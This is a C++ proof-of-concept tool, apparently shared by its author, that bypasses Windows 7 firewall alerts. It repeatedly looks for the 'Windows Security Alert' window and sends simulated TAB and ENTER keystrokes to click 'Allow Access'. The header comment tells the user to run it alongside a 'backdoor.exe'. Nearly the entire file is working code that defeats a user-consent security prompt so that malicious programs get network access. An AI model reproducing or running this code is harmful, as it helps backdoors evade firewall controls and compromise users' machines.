/*
A Proof of Concept how bypass windows firewall
Tested at windows 7

Author: Antonio Costa aka Cooler_,  CoolerVoid
coolerlair@gmail.com

Greetz: M0nad, I4K, Slyfunky, Sigsegv, RaphaelSC, MMxM, F-117, Clandestine, LoganBr, Welias, Luanzeiro, Alan JUmpi...

This bypass the windows firewall, Search firewall GUI if found uses winapi to simulate keystroke tab, enter to allow access of firewall

Example:

g++ bypass_firewall.cpp -o bypass

Click in open at bypass.exe, leave program running

run backdoor.exe, wait the alert of firewall window appear,  look the programm bypass.exe make the bypass at window!

*/
#define WINVER 0x0500
#include <string>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

using namespace std;
using std::string;

string GetActiveWindowTitle()
{
	char wnd_title[256];
	
	HWND hwnd=GetForegroundWindow(); 
	GetWindowText(hwnd,wnd_title,sizeof(wnd_title));
	
	return wnd_title;
}

BOOL CALLBACK EnumWindowsProc(HWND hwnd, LPARAM lParam)
{
	char buffer[128];	
    	int written = GetWindowTextA(hwnd, buffer, 128);

    	if (written && strstr(buffer,"Windows Security Alert") != NULL) // name of firewall GUI title
	{
        	*(HWND*)lParam = hwnd;
        	return FALSE;
    	}

    return TRUE;
}

HWND GetFirewall()
{
    HWND hWnd = NULL;
    EnumWindows(EnumWindowsProc, (LPARAM)&hWnd);
    return hWnd;
}

int main()
{
	short first=0;
PULLBACK:
			
			HWND alertwindow = GetFirewall();
		
		
// detect firewall alert window...
			if(BringWindowToTop(alertwindow))
			{
				INPUT ip;
				
				DWORD dwCurrentThread = GetCurrentThreadId();
				DWORD dwFGThread      = GetWindowThreadProcessId(GetForegroundWindow(), NULL);
				AttachThreadInput(dwCurrentThread, dwFGThread, TRUE);
				SetForegroundWindow(alertwindow);
				AttachThreadInput(dwCurrentThread, dwFGThread, FALSE);
				SetForegroundWindow(alertwindow);
				
				puts("\nBINGOOO\n");
				Sleep(100); // you can change the wait time
				
				SetForegroundWindow(alertwindow);	
				short x=6;
				
// press TAB six times to leave to Allow Acess button
				while(x && first!=0)
				{
					ip.type = INPUT_KEYBOARD;
					ip.ki.wScan = 0; 
					ip.ki.time = 0;
					ip.ki.dwExtraInfo = 0;
					ip.ki.wVk = 0x09; // virtual-key code of TAB
					ip.ki.dwFlags = 0; 
					SendInput(1, &ip, sizeof(INPUT));
					ip.ki.dwFlags = KEYEVENTF_KEYUP; 
					SendInput(1, &ip, sizeof(INPUT));
					Sleep(100);
					x--;
				}
				
				if(!x && first!=0)
				{
// press ENTER at Allow Acess button
					ip.type = INPUT_KEYBOARD;
					ip.ki.wScan = 0; 
					ip.ki.time = 0;
					ip.ki.dwExtraInfo = 0;
 
					ip.ki.wVk = 0x0D; // virtual-key code of ENTER
					ip.ki.dwFlags = 0; 
					SendInput(1, &ip, sizeof(INPUT));
					ip.ki.dwFlags = KEYEVENTF_KEYUP; 
					SendInput(1, &ip, sizeof(INPUT));
				}
				first=1;	
				Sleep(150); // wait time

			}
		
			Sleep(200);	

	goto PULLBACK;
	
}